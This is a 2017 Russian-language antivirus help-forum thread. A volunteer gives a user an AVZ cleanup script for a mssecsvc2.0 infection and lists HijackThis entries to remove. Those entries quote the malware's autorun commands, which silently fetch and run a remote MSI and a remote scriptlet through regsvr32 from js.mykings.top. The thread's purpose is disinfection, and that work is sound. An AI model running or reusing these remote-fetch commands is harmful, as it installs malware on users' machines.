Dysyndyst Опубликовано 13 мая, 2017 Share Опубликовано 13 мая, 2017 (изменено) Здравствуйте, проблема такая же как и у всех, Изменено 13 мая, 2017 пользователем Dysyndyst Ссылка на комментарий Поделиться на другие сайты More sharing options...
Mark D. Pearlstone Опубликовано 13 мая, 2017 Share Опубликовано 13 мая, 2017 Порядок оформления запроса о помощи Ссылка на комментарий Поделиться на другие сайты More sharing options...
Dysyndyst Опубликовано 13 мая, 2017 Автор Share Опубликовано 13 мая, 2017 Прошу прощения за неправильное оформление CollectionLog-2017.05.13-13.44.zip Ссылка на комментарий Поделиться на другие сайты More sharing options...
regist Опубликовано 13 мая, 2017 Share Опубликовано 13 мая, 2017 Здравствуйте!1) - Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь. 2) SpyHunter 4 [2017/05/12 22:45:00]-->C:\Users\Павел\AppData\Roaming\Enigma Software Group\sh_installer.exe -r sh Удалите. 3)Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.Выполните скрипт в АВЗ (Файл - Выполнить скрипт): begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); ClearQuarantineEx(true); SetServiceStart('mssecsvc2.0', 4); StopService('mssecsvc2.0'); DeleteFile('C:\WINDOWS\mssecsvc.exe', '32'); ExecuteFile('schtasks.exe', '/delete /TN "Mysa" /F', 0, 15000, true); DeleteService('SpyHunter 4 Service'); DeleteService('mssecsvc2.0'); RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'start'); RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'start1'); CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip'); ExecuteSysClean; RebootWindows(true); end. После выполнения скрипта компьютер перезагрузится.4) - Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.comПолученный ответ сообщите здесь (с указанием номера KLAN) 5) "Пофиксите" в HijackThis (некоторые строки могут отсутствовать): O4 - HKLM\..\Run: [start1] C:\Windows\system32\msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q O4 - HKLM\..\Run: [start] C:\Windows\system32\regsvr32.exe /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll O4 - HKU\S-1-5-18\..\RunOnce: [{80655FC2-A38F-4B8C-8775-9A3C68A6C305}] C:\Program Files (x86)\MSI\Live Update\LU5\DL_FILE\Killer_Network_Drivers_1.1.42.1045\Setup.exe /silent (file missing) O4 - MSConfig\startupreg: [BNM Updater] C:\Users\Павел\AppData\Local\Beeline Network Manager\updater\chp.exe cmd.exe /c ""C:\Users\Павел\AppData\Local\Beeline Network Manager\updater\bash-run.bat" "beeline-wizard-updater"" (file missing) (HKLM) (2014/09/13) O4 - MSConfig\startupreg: [EPLTarget] (no file) (2014/09/13) O21 - ShellIconOverlayIdentifiers: 00asw - {472083B0-C522-11CF-8763-00608CC02F24} - (no file) O21 - ShellIconOverlayIdentifiers: 00avast - {472083B0-C522-11CF-8763-00608CC02F24} - (no file) O22 - Task (Ready): Avast Emergency Update - C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe (file missing) O22 - Task (Ready): ParetoLogic Update Version3 - C:\Program Files (x86)\Common Files\ParetoLogic\UUS3\Pareto_Update3.exe (file missing) O22 - Task (Ready): ParetoLogic Update Version3 Startup Task - C:\Program Files (x86)\Common Files\ParetoLogic\UUS3\Pareto_Update3.exe -StartupTask (file missing) O22 - Task (Ready): SafeZone scheduled Autoupdate 1468305763 - C:\Program Files\AVAST Software\SZBrowser\launcher.exe --scheduledautoupdate $(Arg0) (file missing) O22 - Task (Ready): \AVAST Software\Avast settings backup - C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe /backup /iavs (file missing) O22 - Task (Ready): {485346E6-1024-41D8-A0CD-4CA331E36AE9} - C:\Users\Павел\Desktop\directx_Jun2010_redist.exe (file missing) O22 - Task (Ready): {4AEA447C-98A5-44D0-9CA5-635AD6037838} - G:\Program Files (x86)\From Dust\Titanfall2\__Installer\vc\vc2010sp1\redist\vcredist_x64.exe (file missing) O22 - Task (Ready): {76A32D2F-D274-4D1D-9B7C-5E3539B3A29E} - G:\Games\Dark Souls III\Game\DarkSoulsIII.exe (file missing) 5) Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. Для повторной диагностики запустите снова Autologger. Ссылка на комментарий Поделиться на другие сайты More sharing options...
Рекомендуемые сообщения
Пожалуйста, войдите, чтобы комментировать
Вы сможете оставить комментарий после входа в
Войти